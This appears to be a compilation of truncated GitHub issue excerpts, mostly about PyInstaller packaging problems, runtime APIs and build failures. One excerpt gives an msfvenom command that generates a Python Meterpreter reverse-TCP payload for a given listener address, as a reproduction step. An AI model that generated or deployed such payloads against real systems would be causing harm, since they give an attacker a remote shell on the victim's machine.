-
```javascript
Graphics.Image.load('image.png')
```
This tries to load the file `image.png` from the same folder as the executable. But, `image.png` is actually in a temp folder, because I've pac…
-
**Python API for runtime**
I would like to have python api for runtime, this will enable us to load AOT in python.
> import ticore, ticolore.load_aot_module("tcm"). runkernel
**runtime api enab…
-
## 🐛 Bug Report
Typo in system name causes crashes in pyinstaller version
## 🔬 How To Reproduce
Steps to reproduce the behavior:
1. User report indicates it's as simple as typing b170 instea…
-
I've been enjoying using eel (in [this project](https://github.com/sortitionfoundation/stratification-app) so far). Running pyinstaller locally produces a single file that works as expected. So I th…
-
## Steps to reproduce
How'd you do it?
1. Generate the payload with `msfvenom /p python/meterpreter/reverse_tcp LHOST=192.168.1.242 LPORT=4444 -o meterpreter.py`
2. Upload the script to a windo…
-
I'm trying to build an executable from a simple python script using pyvisa-py but I'm running into error after I run the executable generated by pyinstaller.
Here what my small python code look…
-
### 问题描述 Please describe your issue
导入的是deploy/python/infer.py
Traceback (most recent call last):
File "pedestrain_infer.py", line 7, in
from infer import Detector
File "", line 983, i…
-
# TODO
pip freeze > requirements.txt # will save all your python libraries with current version into requirements.txt file
python -m pip install -U pip setuptools wheel
python -m pip install -U…
-
*Issue type:* bug
*Severity:* medium
**Describe the issue**
Windows EXE builds but does not run. See several iterations and the apparent resolution below.
The resolution was taken from Stack…
-
pyinstaller打包有没有一个校验文件完整性的开关可以关掉?